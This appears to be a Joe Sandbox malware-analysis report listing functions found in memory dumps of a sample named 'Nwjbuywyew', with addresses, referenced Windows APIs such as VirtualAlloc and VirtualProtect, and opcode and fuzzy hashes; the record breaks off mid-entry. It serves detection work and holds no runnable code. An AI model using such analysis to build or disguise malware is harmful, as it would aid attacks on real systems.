
Strings

l8, xrefs: 075ED74A

Memory Dump Source

Source File: 0000000D.00000002.1905828815.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75e0000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID: l8
API String ID: 0-3536986210
Opcode ID: 48dc2ecfcc317e29466f79b8232e9e7a8e039fed834b69f492d8aab3ae4a9702
Instruction ID: 536f823563f053d54013d55d925157b1bb2043e2671f5181a8d2b53626a94980
Opcode Fuzzy Hash: 48dc2ecfcc317e29466f79b8232e9e7a8e039fed834b69f492d8aab3ae4a9702
Instruction Fuzzy Hash: C3F10D75B00209DFDB08EF64D49499DBBB6FFC9310F108569E805AB3A4DB34AD86CB91

Function 097408D0 Relevance: 1.6, APIs: 1, Instructions: 111
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 09740992

Memory Dump Source

Source File: 0000000D.00000002.1920012628.0000000009740000.00000040.00000800.00020000.00000000.sdmp, Offset: 09740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_9740000_Nwjbuywyew.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: b610008c8f232a1dd31ea5f777c9fe2863984b947c7d3eb51bc9aa3e7f923b08
Instruction ID: bf8764079508c5bdc711ecc378547696bfcf94a186f652014c3ca500d7356908
Opcode Fuzzy Hash: b610008c8f232a1dd31ea5f777c9fe2863984b947c7d3eb51bc9aa3e7f923b08
Instruction Fuzzy Hash: F44199B9D052589FDF10CFA9D884ADEBBB5FF49310F10942AE814B7210D735A941CF68

Function 097408E8 Relevance: 1.6, APIs: 1, Instructions: 101fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 09740992

Memory Dump Source

Source File: 0000000D.00000002.1920012628.0000000009740000.00000040.00000800.00020000.00000000.sdmp, Offset: 09740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_9740000_Nwjbuywyew.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 4bad9a62d38f163d984b638d40d058ba9ab4375492a837355e482e0e1bc62897
Instruction ID: 8bd53b7466b88aac3ea5a0dc2118bd11e84063ef255ef3a28a7bca9d746a5faf
Opcode Fuzzy Hash: 4bad9a62d38f163d984b638d40d058ba9ab4375492a837355e482e0e1bc62897
Instruction Fuzzy Hash: 343189B9D042589FDF10CFAAD984ADEFBB5BB49310F10942AE815B7210D735A941CF64

Function 075E6AA8 Relevance: 1.6, Strings: 1, Instructions: 350COMMON

Download Yara Rule

Strings

d, xrefs: 075E6D09

Memory Dump Source

Source File: 0000000D.00000002.1905828815.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75e0000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: c45138e55f6f733f2d2a352b5cbc1ff26bf49fa9c9929215c1b9347a5f23fdb5
Instruction ID: 125ab644a2696339200eb327eb703b81032c3cde5775cf8fc8019acc6b564b15
Opcode Fuzzy Hash: c45138e55f6f733f2d2a352b5cbc1ff26bf49fa9c9929215c1b9347a5f23fdb5
Instruction Fuzzy Hash: 5AD18E74300606CFC728DF18C4849AAB7FAFF89350B558969D45A9B7A1DB30FC55CB90

Function 0996D628 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0996D6CC

Memory Dump Source

Source File: 0000000D.00000002.1921448023.0000000009960000.00000040.00000800.00020000.00000000.sdmp, Offset: 09960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_9960000_Nwjbuywyew.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 48042b59f1e1bc1395a18e104501dc8de5ff06406965efdfc9161d43b9a50129
Instruction ID: 63bc8039af28a3bc590388ec9f944e602df54000932e9c329a7c47117e63d1bd
Opcode Fuzzy Hash: 48042b59f1e1bc1395a18e104501dc8de5ff06406965efdfc9161d43b9a50129
Instruction Fuzzy Hash: 7A31A8B8D012489FCF10CFAAD884ADEFBB5AF49310F14942AE814B7210D735A945CF54

Function 075E0448 Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

s$, xrefs: 075E072B, 075E0730

Memory Dump Source

Source File: 0000000D.00000002.1905828815.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75e0000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID: s$
API String ID: 0-3693107832
Opcode ID: 1b024616d48a9ffcf7822f70ca1045b1c6e936c6fe4653091f99a9ed69071976
Instruction ID: a897d16b0db76cfff5dccaec6430f40b678bea0b5fcdfb9c427c6dd60571dc82
Opcode Fuzzy Hash: 1b024616d48a9ffcf7822f70ca1045b1c6e936c6fe4653091f99a9ed69071976
Instruction Fuzzy Hash: BDA17DB5B02219AFCB08DFA4D545AEDBBF6FF88210F20846AE4059B390DBB5DD45CB50

Function 0996E7F0 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0996E88F

Memory Dump Source

Source File: 0000000D.00000002.1921448023.0000000009960000.00000040.00000800.00020000.00000000.sdmp, Offset: 09960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_9960000_Nwjbuywyew.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a5db9859b453f82c651652988cb60b8ffacb6984daa1e106b292c90f10f03975
Instruction ID: 3b78a0b1a6be2d7242d7a68f79aff4702a31a9cf896ff97db8c7a90e06b9b6be
Opcode Fuzzy Hash: a5db9859b453f82c651652988cb60b8ffacb6984daa1e106b292c90f10f03975
Instruction Fuzzy Hash: 723198B9D012489FDF14CFA9E884ADEFBB5EF49320F14942AE814B7210D735A945CFA4

Function 0977A98F Relevance: 1.3, Strings: 1, Instructions: 14COMMON

Download Yara Rule

Strings

[, xrefs: 0977A999

Memory Dump Source

Source File: 0000000D.00000002.1920601008.0000000009770000.00000040.00000800.00020000.00000000.sdmp, Offset: 09770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_9770000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID: [
API String ID: 0-784033777
Opcode ID: 19e3275a5eb84e5a0fd9b24b85be74dcb6e9e3016a0c5407b742b4adb3bb2f5e
Instruction ID: 7d0284425027e024007b07a0b1b069ae37ce8b1645d8b840b4774231221b3325
Opcode Fuzzy Hash: 19e3275a5eb84e5a0fd9b24b85be74dcb6e9e3016a0c5407b742b4adb3bb2f5e
Instruction Fuzzy Hash: 3EE0BD31800718CBEB508F24C898BEEB7B5BF46B09F10119580096B255CBB91AC9CF42

Function 097710B5 Relevance: 1.3, Strings: 1, Instructions: 11COMMON

Download Yara Rule

Strings

!, xrefs: 0977188E

Memory Dump Source

Source File: 0000000D.00000002.1920601008.0000000009770000.00000040.00000800.00020000.00000000.sdmp, Offset: 09770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_9770000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID: !
API String ID: 0-2657877971
Opcode ID: 637645994a8aebec9218d0ee4b1e4b7cbb50a51c0656ba5ab95cb02aa8d0beaa
Instruction ID: e7492b841fc20c63a4018ad30c02bb419b4eaac5ba3fcd4fe07477579fcdf208
Opcode Fuzzy Hash: 637645994a8aebec9218d0ee4b1e4b7cbb50a51c0656ba5ab95cb02aa8d0beaa
Instruction Fuzzy Hash: A8D04878D083299BCFA0CF50C989B9DBBB6AB0A360F1051999509A2260CB315AC8DF05

Function 075E9BC0 Relevance: .7, Instructions: 677COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1905828815.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75e0000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54df5c6f2085f2bdf96a9717b27749cfe034058214ea13f706539886d0e55806
Instruction ID: e1577d69b3e012fde22ef412258ab303a7ef28c11dc070a4a82cfec07996b9d4
Opcode Fuzzy Hash: 54df5c6f2085f2bdf96a9717b27749cfe034058214ea13f706539886d0e55806
Instruction Fuzzy Hash: 2F521CB5A002299FDB68CB68C940BEDBBF6BF88300F1544D9E549AB351DA349D80CF61

Function 075E4488 Relevance: .5, Instructions: 543COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1905828815.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75e0000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70ade496d25f7d5b8bff32beae8d31fadd5ac68135b3feae02834417bb997050
Instruction ID: 791b135a389052f4667fa0d1aa660a2767833830f3a0dd1dcf19e49e5a93fca0
Opcode Fuzzy Hash: 70ade496d25f7d5b8bff32beae8d31fadd5ac68135b3feae02834417bb997050
Instruction Fuzzy Hash: F3229EB5A10255DFDB08CFA8D494AADBBF6BF89300F148069E905EB3A1DB75DC41CB90

Function 075E73B8 Relevance: .5, Instructions: 494COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1905828815.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75e0000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4606cb741da022f0b18ead5908d3d674508e7acdd9c99d44079e9f0af26bbf3
Instruction ID: 1256bd8959413b33ba91dd6462b6651f3f2d1230a60d0b1122de2e6be0e34e44
Opcode Fuzzy Hash: f4606cb741da022f0b18ead5908d3d674508e7acdd9c99d44079e9f0af26bbf3
Instruction Fuzzy Hash: 4F125BB4A00305DFDB18DFA5D894AAEBBF6FF88300F148929D4469B6A4DB35EC45CB50

Function 07C61A38 Relevance: .4, Instructions: 411COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1910865539.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7c60000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fc8fb876cc63a28b5e2fe83268a5435056205b147e91e5f30ea917913b3103e
Instruction ID: 93154958dc726e69dfce3cbcb6e0be53599f62845ce8412ce84643bbb2fda82a
Opcode Fuzzy Hash: 0fc8fb876cc63a28b5e2fe83268a5435056205b147e91e5f30ea917913b3103e
Instruction Fuzzy Hash: 30D14BB170424ECFCB15DB79C4D87AABBF2AFC6212F18846AD545CB251EB31CA81C791

Function 075E7B78 Relevance: .4, Instructions: 399COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1905828815.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75e0000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50fb684fe638a933eaa6afde3f74fd6a55a6559ccc80140d38749039673ad151
Instruction ID: b8f91689f04a6390852268546d38ccc7dafc66ceb650d48e0dd5714103f4b6d4
Opcode Fuzzy Hash: 50fb684fe638a933eaa6afde3f74fd6a55a6559ccc80140d38749039673ad151
Instruction Fuzzy Hash: D6E1C3746002159FDB09DF68C444AADBBFAFF89310F1589A9E8059B391CB34EC86CB91

Function 075E8CE0 Relevance: .4, Instructions: 370COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1905828815.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75e0000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21db30062e1203ff3414b072f9b8d0b949cb756a3dc7bff798c740b14a591583
Instruction ID: 611bfe9b7d294507f8984d303574cd934fb69b1de29b6ff4a92d1f83d4ab77c2
Opcode Fuzzy Hash: 21db30062e1203ff3414b072f9b8d0b949cb756a3dc7bff798c740b14a591583
Instruction Fuzzy Hash: 40F1DB74B00219DFDB08DFA4D998A9DB7B6FF88300F518559E905AB3A5CB70EC42CB91

Function 07C64160 Relevance: .4, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1910865539.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7c60000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da1f4b6cd574c8db5ba835dad7f057d39a40834432fd151817e76e03dac8173f
Instruction ID: f707e5d86fbfe3e15233cce70e4b66a86792603e61dbac4ec8e2537c7b1cf4a8
Opcode Fuzzy Hash: da1f4b6cd574c8db5ba835dad7f057d39a40834432fd151817e76e03dac8173f
Instruction Fuzzy Hash: 84F1C6B4D01259DFCB18EFA5D5D86ACBBB2FF4A311F204429E506A7364DB355A85CF00

Function 075E38E8 Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1905828815.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75e0000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5c5fa16969039665c176e242803bec3c63e162b1c38326535ab49371f39c9a8
Instruction ID: ce6a976913ab674534080ee7adae78f7281677d416e9edf447e4f93207eb6564
Opcode Fuzzy Hash: f5c5fa16969039665c176e242803bec3c63e162b1c38326535ab49371f39c9a8
Instruction Fuzzy Hash: BCE15EB0E0021ADFDB19DFA4C854BEEBBBABF88700F144055D501A73A4DBB59D45CB91

Function 05248320 Relevance: .3, Instructions: 344COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1824420251.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_5240000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 926f356c338861403043dbedebc4e422cf1d11088b3d84e985bd9021aeadd2ee
Instruction ID: f4956caff438fd378fd58f3a224425193d480d8e109584ab3fb04ea16fd75eec
Opcode Fuzzy Hash: 926f356c338861403043dbedebc4e422cf1d11088b3d84e985bd9021aeadd2ee
Instruction Fuzzy Hash: C1D127356002009FCB08DF68C8849AD77F6BF8A314F208569E9069F3A1DB35ED46CBA4

Function 052471E8 Relevance: .3, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1824420251.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_5240000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4796d84e85bd8424a83b3d65dde9e7710715e1e518d2410f3e33f2be56ecbe7a
Instruction ID: 56fc0d9775bd0bc27e217336d5c395b7396d6c7e911dc9acabd853e9d2657f54
Opcode Fuzzy Hash: 4796d84e85bd8424a83b3d65dde9e7710715e1e518d2410f3e33f2be56ecbe7a
Instruction Fuzzy Hash: D9C1A031A102498FDB18DFA4D844A6DBBB6FF85300F194559D81AAF365CB34ED4ACF80

Function 075EDC50 Relevance: .3, Instructions: 291COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1905828815.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75e0000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68e209dd127de3648c672551f6f1d29de73caaeec0a1360fe8a7f6f0a42ccebc
Instruction ID: 6cb7cad3c70343ccc0b7c90205eedaee1b29199e197a5b518d5712bf2191d9fb
Opcode Fuzzy Hash: 68e209dd127de3648c672551f6f1d29de73caaeec0a1360fe8a7f6f0a42ccebc
Instruction Fuzzy Hash: F7A19175700301EFD71A8B68D854AAA7BB7FFC9310F1584AAE5058B3A1CB35EC42DB91

Function 075E9BB1 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1905828815.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75e0000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 347607e0886e99e7b08fb5efd1d3f6000ccf0b48181fb6d97d359a59418984c9
Instruction ID: ea534020e28362be8873da50d76756d48fe4a84956ae2c697f9c4e5f5d912fa9
Opcode Fuzzy Hash: 347607e0886e99e7b08fb5efd1d3f6000ccf0b48181fb6d97d359a59418984c9
Instruction Fuzzy Hash: 01C163B5A002199FDB18DB68C944BDDBBF6BF88700F158099E509AB360DB34DD81CF61

Function 075E4C20 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1905828815.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75e0000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 257183ae09a2605dbbc1289af66dffc19cecf4ff2f457b74bff347b2589a55a8
Instruction ID: bff3b49b1c70c1cec2ad8802c87068b9f52a8d2224266d7d8abfe628d9df0a5e
Opcode Fuzzy Hash: 257183ae09a2605dbbc1289af66dffc19cecf4ff2f457b74bff347b2589a55a8
Instruction Fuzzy Hash: 53911574B002158FDB08DF69C884AAA7BFABF89714F1444AAE505DF3A5DB70DC41CBA1

Function 075ECFB8 Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1905828815.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75e0000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 100c7ebcccf2df0bb93bff3fcbc054dd331236e0402459fd8efe2b292c4ad4fd
Instruction ID: 2af899b2646825920e6a04a1dbc376416bf40ab9f7c3503cb38845332d7b598d
Opcode Fuzzy Hash: 100c7ebcccf2df0bb93bff3fcbc054dd331236e0402459fd8efe2b292c4ad4fd
Instruction Fuzzy Hash: 51A118B4B00219CFCB18DF24C894BA9B7B6BF89300F5085A9D54AAB395DB70ED85CF51

Function 075E8CD0 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1905828815.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75e0000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a4154394581869736e642b03c2a62ed6ddeef6677124cd4126b2a9ec36a2bbb
Instruction ID: d65dcd714ff011d571fc36b328cbaaca653036cf8c9d86f674da86e3dc3d0345
Opcode Fuzzy Hash: 9a4154394581869736e642b03c2a62ed6ddeef6677124cd4126b2a9ec36a2bbb
Instruction Fuzzy Hash: 57A11C74B10219DFCB08EFA4D894A9DB7B6FF88310F549559E405AB364CB30BC46CB91

Function 075EDF70 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1905828815.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75e0000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d1cb4dce75ddad667c7826ee6099653adf86dc758075b064f7daa7062a8cd99
Instruction ID: d6f094073bdc306a5dff7718f16fdba615f4c57b7abbbbf52e7929b845eb8294
Opcode Fuzzy Hash: 3d1cb4dce75ddad667c7826ee6099653adf86dc758075b064f7daa7062a8cd99
Instruction Fuzzy Hash: 56915DB5B10215DFDB08DF68D894AADB7B6BF89710F1040A9E406DB3A1CB34EC42CB91

Function 07C60288 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1910865539.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7c60000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee02c34f8630b769e6987d9b7b387a1d2f020f80ebd077ee201ee0df0bd89963
Instruction ID: b18f8c8b539cd08765b904ae476b5164120da4c16e9a03e5b583c241686aeb6b
Opcode Fuzzy Hash: ee02c34f8630b769e6987d9b7b387a1d2f020f80ebd077ee201ee0df0bd89963
Instruction Fuzzy Hash: 026169B17052158FDB25977988D46BEB7A1AFC2121F24407BC906FB281EB35CAC1C7A6

Function 05242DF0 Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1824420251.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_5240000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f75db543b1de3b0077636c8000ac7d5ba4391143ec293638a7a8dad996d68149
Instruction ID: 3bdb1442f7ac024d2b3545ea3da098433b4baee714b87832707b9da432a2f53a
Opcode Fuzzy Hash: f75db543b1de3b0077636c8000ac7d5ba4391143ec293638a7a8dad996d68149
Instruction Fuzzy Hash: A4918D74A00245DFCB19CF59C494AAEFBB1FF89310B258699E415AB361C735EC91CFA0

Function 075E59B8 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1905828815.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75e0000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f78de3ebf673fd720128807ecdd012fdb15370fda66e0ce032bcbf0afdfc328
Instruction ID: 7af3cf7ab9c4c54492e7cff6afdee1e2d04be6d7d24ce0a9a8936cfe19fb5e8a
Opcode Fuzzy Hash: 8f78de3ebf673fd720128807ecdd012fdb15370fda66e0ce032bcbf0afdfc328
Instruction Fuzzy Hash: 1E812E75A00615CFCB18DF68C884A9DB7F9FF88714F15856AE4469B360EB70ED81CB90

Function 05249900 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1824420251.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_5240000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3012467bd0f9e7117876776bf0716cfdd61648fc63430aef4fd423fadaaf6c32
Instruction ID: f061fb553e864f7221244bdfe39e2f205d87fead272880aafeab79d277658e9d
Opcode Fuzzy Hash: 3012467bd0f9e7117876776bf0716cfdd61648fc63430aef4fd423fadaaf6c32
Instruction Fuzzy Hash: 8861D270620214CFD758EB68D488BAE77F2FF85310F5084A9D14A9B3A5DB359C89CF91

Function 075EFBD8 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1905828815.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75e0000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f761ac20ff4bda6b7ceeaa74c8b6983ba3587b58f4058e2e698f03c0a7b49b6d
Instruction ID: 82ad4d5a628e6ca55e5b2b6a73687ecc017c0c99cce3c6924490c8bdb75f6651
Opcode Fuzzy Hash: f761ac20ff4bda6b7ceeaa74c8b6983ba3587b58f4058e2e698f03c0a7b49b6d
Instruction Fuzzy Hash: DF718C74B00616CFDB08EB64C494AADB3BAFFC8700F108569D5069B3A4DF74AD46CB91

Function 075E2AF0 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1905828815.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75e0000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7efdf2482d49be42095137c15ea08bd83947c123305c6a3b0f8242c71b62d3df
Instruction ID: e572627c9256c401140ee2aaa8bd5872e72c3806d7a5092d9d6a6686672e4b01
Opcode Fuzzy Hash: 7efdf2482d49be42095137c15ea08bd83947c123305c6a3b0f8242c71b62d3df
Instruction Fuzzy Hash: 8851BD74700715AFD719EB78C4546AE7BBABFC6200B20486DD4468B7A4CF35EC86CBA1

Function 075EDF61 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1905828815.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75e0000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73607dee95c37b357eaa837a13e058e9e2da19097280d83428cd643ad47a41a7
Instruction ID: fd32827007e2572e40eed8e4831bbf67da36ee0de7ae248d8f211248f5ce9f9f
Opcode Fuzzy Hash: 73607dee95c37b357eaa837a13e058e9e2da19097280d83428cd643ad47a41a7
Instruction Fuzzy Hash: 11612BB5B10615DFDB08DF68D894AADB7BAFF89710F1041A9E5069B361CB30EC41CB91

Function 09B9A7D0 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1922279912.0000000009B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_9b80000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84f60d3cd97b070f06c26901b1b23a96ae80d3ea84b0d5435226e2ecd5bcba75
Instruction ID: f2d4c31683daa796cc3c3b1a07063c2cc83d327b3b946f9940660a9ae5a5bbc1
Opcode Fuzzy Hash: 84f60d3cd97b070f06c26901b1b23a96ae80d3ea84b0d5435226e2ecd5bcba75
Instruction Fuzzy Hash: DD6103B4E25219DFDF04DFA8E988AEDBBB2FB89310F508069E406AB290D7345D45CB51

Function 075E0798 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1905828815.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_75e0000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81265524d206c82687ac8cf57672ca9278e6000d975e37048201307159e8efe3
Instruction ID: b1cf94a0d23dc557eb49c6d52fb4f3e09bcb7fbe2c2c4010f2b7dcf262842090
Opcode Fuzzy Hash: 81265524d206c82687ac8cf57672ca9278e6000d975e37048201307159e8efe3
Instruction Fuzzy Hash: 2451B2B5B002069FE7189F69D854B9AB7F9FB85310F20843AD859DB685CB71E802CB90

Function 05249958 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1824420251.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_5240000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad7264ecf2964d931f97e91d7038aa1bc6c1afe56bd81970c28ba8ff26d63586
Instruction ID: 9c500d7c4f7732f3d111bba655574628b184ecbc1df3a13f1615d2809a968188
Opcode Fuzzy Hash: ad7264ecf2964d931f97e91d7038aa1bc6c1afe56bd81970c28ba8ff26d63586
Instruction Fuzzy Hash: B6518C70A10214CFD758EB68D448BAE77F2FF85300F5084A8D54AAB3A4DB759C89CF91

Function 07C605C8 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1910865539.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7c60000_Nwjbuywyew.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f1e99506b1e6519228bb7a600b9c3e20c05d032f00ac3e1ea34cbed47ff56d5
Instruction ID: e7a7155161d4cba2f4cf74d7ba2dd9568684ce96bb33019200851ddbfd7cc398
Opcode Fuzzy Hash: 9f1e99506b1e6519228bb7a600b9c3e20c05d032f00ac3e1ea34cbed47ff56d5
